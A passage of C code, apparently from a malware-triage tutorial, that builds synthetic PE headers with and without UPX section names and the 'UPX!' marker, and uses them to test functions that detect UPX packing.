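    out[0x100] = 0x0b; out[0x101] = 0x01;      /* optional header magic: PE32 */
    for (i = 0; i < nsect; i++) {
        size_t l = strlen(names[i]);
        memcpy(out + table + (size_t)i * SECTION_HEADER_SIZE, names[i], l > 8 ? 8 : l);
    }
    if (with_upx_magic)                        /* version string then marker */
        memcpy(out + table + (size_t)nsect * SECTION_HEADER_SIZE, "3.04\0UPX!", 9);
    return need;
}

static const char *UPX_NAMES[]   = { "UPX0", "UPX1", ".rsrc" };   /* as in the dump */
static const char *PLAIN_NAMES[] = { ".text", ".data", ".rsrc" }; /* unpacked-looking */

int  demo_upx_sections(void)   { uint8_t b[1024]; size_t n = build_pe(b, sizeof b, UPX_NAMES, 3, 1);   return upx_section_count(b, n); }
long demo_upx_magic(void)      { uint8_t b[1024]; size_t n = build_pe(b, sizeof b, UPX_NAMES, 3, 1);   return upx_magic_offset(b, n); }
int  demo_plain_sections(void) { uint8_t b[1024]; size_t n = build_pe(b, sizeof b, PLAIN_NAMES, 3, 0); return upx_section_count(b, n); }
long demo_plain_magic(void)    { uint8_t b[1024]; size_t n = build_pe(b, sizeof b, PLAIN_NAMES, 3, 0); return upx_magic_offset(b, n); }
int  demo_not_pe(void)         { uint8_t b[1024]; size_t n = build_pe(b, sizeof b, PLAIN_NAMES, 3, 0); b[0] = 'X'; return upx_section_count(b, n); }

int main(void)
{
    printf("synthetic UPX sample: %d UPX sections, UPX! at 0x%lx\n", demo_upx_sections(), demo_upx_magic());
    printf("synthetic plain sample: %d UPX sections, UPX! at %ld\n", demo_plain_sections(), demo_plain_magic());
    printf("not a PE file: %d\n", demo_not_pe());
    return 0;
}
```

For a real sample, read the file into a buffer and call upx_section_count() and upx_magic_offset() on it; on the dump above the section count would be 2 and the magic offset 0x3e0.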